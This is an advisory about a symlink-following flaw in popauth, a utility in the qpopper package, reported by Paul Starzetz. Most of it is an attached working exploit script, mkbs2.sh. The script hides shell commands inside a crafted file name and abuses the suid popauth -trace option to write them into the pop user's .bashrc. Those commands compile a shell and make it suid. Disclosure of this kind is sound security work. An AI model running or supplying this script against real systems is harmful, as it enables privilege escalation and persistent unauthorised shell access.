COMMAND popauth symlink problem SYSTEMS AFFECTED current version of popauth (packaged with qpopper) PROBLEM Paul Starzetz reported following : there is a symlink problem in the popauth utility, which is part of the qpoper package. The binary is often istalled suid pop and follows symlinks in the -trace file option. This problem has been reported to vendors in June 2001. Impact: in case of suid popauth and valid shell for user pop, the attached script will create suid-pop shell, if someone su to pop. This may happen as a part of some automated check script (startup script). This vulnerability is not very crucial, however it should be reported at least once. Script ======= --------------50454D7A3503FA206F88387D Content-Type: application/x-sh; name=\"mkbs2.sh\" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename=\"mkbs2.sh\" #!/bin/bash # popauth symlink follow vuln by IhaQueR # this will create .bashrc for user pop # and ~pop/sup suid shell FILE=$(perl -e \'print \"/tmp/blah1\\\"\\ncd ~\\necho >blah.c \\\"#include <stdio.h>\\nmain(){setreuid(geteuid(),getuid());execlp(\\\\\\\"bash\\\\\\\", \\\\\\\"bash\\\\\\\",NULL);}\\\"\\ngcc blah.c -o sup\\nchmod u+s sup\\necho done\\n\\n\\\"\"\') ln -s /var/lib/pop/.bashrc \"$FILE\" /usr/sbin/popauth -trace \"$FILE\" --------------50454D7A3503FA206F88387D-- SOLUTION Nothing yet.